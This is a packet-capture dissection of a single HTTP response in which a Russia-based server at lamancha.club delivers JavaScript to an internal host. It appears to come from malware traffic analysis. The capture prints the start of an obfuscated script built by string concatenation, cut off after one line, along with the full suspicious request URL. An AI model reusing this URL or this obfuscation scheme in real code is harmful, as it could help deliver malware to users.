Frame 97: Packet, 1328 bytes on wire (10624 bits), 1328 bytes captured (10624 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Nov 21, 2017 01:00:42.920227000 UTC
    UTC Arrival Time: Nov 21, 2017 01:00:42.920227000 UTC
    Epoch Arrival Time: 1511226042.920227000
    [Time shift for this packet: 0.000000000 seconds]
    [Time delta from previous captured frame: 258.095000 milliseconds]
    [Time since reference or first frame: 37.054487000 seconds]
    Frame Number: 97
    Frame Length: 1328 bytes (10624 bits)
    Capture Length: 1328 bytes (10624 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:http:data-text-lines]
    Character encoding: ASCII (0)
Ethernet II, Src: Netgear_8d:2e:93 (74:44:01:8d:2e:93), Dst: HewlettPacka_d7:16:7c (00:1a:4b:d7:16:7c)
    Destination: HewlettPacka_d7:16:7c (00:1a:4b:d7:16:7c)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: Netgear_8d:2e:93 (74:44:01:8d:2e:93)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
    [Stream index: 0]
Internet Protocol Version 4, Src: 109.120.150.110, Dst: 10.4.1.102
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 1314
    Identification: 0xc97d (51581)
    000. .... = Flags: 0x0
        0... .... = Reserved bit: Not set
        .0.. .... = Don't fragment: Not set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 128
    Protocol: TCP (6)
    Header Checksum: 0x5d08 [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 109.120.150.110
    Destination Address: 10.4.1.102
    [Source GeoIP: RU]
        [Source GeoIP Country: Russia]
        [Source or Destination GeoIP Country: Russia]
        [Source GeoIP ISO Two Letter Country Code: RU]
        [Source or Destination GeoIP ISO Two Letter Country Code: RU]
        [Source GeoIP Latitude: 55.7386]
        [Source or Destination GeoIP Latitude: 55.7386]
        [Source GeoIP Longitude: 37.6068]
        [Source or Destination GeoIP Longitude: 37.6068]
    [Stream index: 9]
Transmission Control Protocol, Src Port: 80, Dst Port: 49161, Seq: 1490, Ack: 1678, Len: 1274
    Source Port: 80
    Destination Port: 49161
    [Stream index: 4]
    [Stream Packet Number: 12]
    [Conversation completeness: Incomplete, DATA (15)]
        ..0. .... = RST: Absent
        ...0 .... = FIN: Absent
        .... 1... = Data: Present
        .... .1.. = ACK: Present
        .... ..1. = SYN-ACK: Present
        .... ...1 = SYN: Present
        [Completeness Flags: ··DASS]
    [TCP Segment Len: 1274]
    Sequence Number: 1490    (relative sequence number)
    Sequence Number (raw): 3620073905
    [Next Sequence Number: 2764    (relative sequence number)]
    Acknowledgment Number: 1678    (relative ack number)
    Acknowledgment number (raw): 2557490690
    0101 .... = Header Length: 20 bytes (5)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window: 64240
    [Calculated window size: 64240]
    [Window size scaling factor: -2 (no window scaling used)]
    Checksum: 0x3300 [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    [Timestamps]
        [Time since first frame in this TCP stream: 701.357000 milliseconds]
        [Time since previous frame in this TCP stream: 258.095000 milliseconds]
    [SEQ/ACK analysis]
        [iRTT: 184.943000 milliseconds]
        [Bytes in flight: 1274]
        [Bytes sent since last PSH flag: 1274]
    [Client Contiguous Streams: 1]
    [Server Contiguous Streams: 1]
    TCP payload (1274 bytes)
Hypertext Transfer Protocol
    HTTP/1.1 200 OK\r\n
        Response Version: HTTP/1.1
        Status Code: 200
        [Status Code Description: OK]
        Response Phrase: OK
    Server: nginx/1.13.4\r\n
    Date: Tue, 21 Nov 2017 01:00:42 GMT\r\n
    Content-Type: text/javascript\r\n
    Content-Length: 147814\r\n
        [Content length: 147814]
    Connection: keep-alive\r\n
    X-Powered-By: PHP/5.4.45-0+deb7u11\r\n
    \r\n
    [Request in frame: 95]
    [Time since request: 258.161000 milliseconds]
    [Request URI […]: /counter/?00000019YBCtvdxvmvPXJSb9u4bzvNFZ97MGaK2d05891000MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxbmPHI8ET5F8rR5VuhQnF2OUanzCex-e7QwUGEb__Aq3i2ZnVl21tYurmxWK2GEhHWqWWUxJYiDDMUYHYjBi4JzJ3N06m_nTosgW-rI46dnntfTSSWS1Jk]
    [Full request URI […]: http://lamancha.club/counter/?00000019YBCtvdxvmvPXJSb9u4bzvNFZ97MGaK2d05891000MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxbmPHI8ET5F8rR5VuhQnF2OUanzCex-e7QwUGEb__Aq3i2ZnVl21tYurmxWK2GEhHWqWWUxJYiDDMUYHYjBi4JzJ3N06m]
    File Data: 1081 bytes
Line-based text data: text/javascript (1 lines)
    […] va766a69d30d191d748a7c9fec66d54f5r goxe='va766a69d30d191d748a7c9fec66d54f5r ld=0; ';goxe+='va766a69d30d191d748a7c9fec66d54f5r cs=St';goxe+='ring.fro';goxe+='mCha766a69d30d191d748a7c9fec66d54f5rCode(';goxe+='92); ';goxe+='va766a69d30d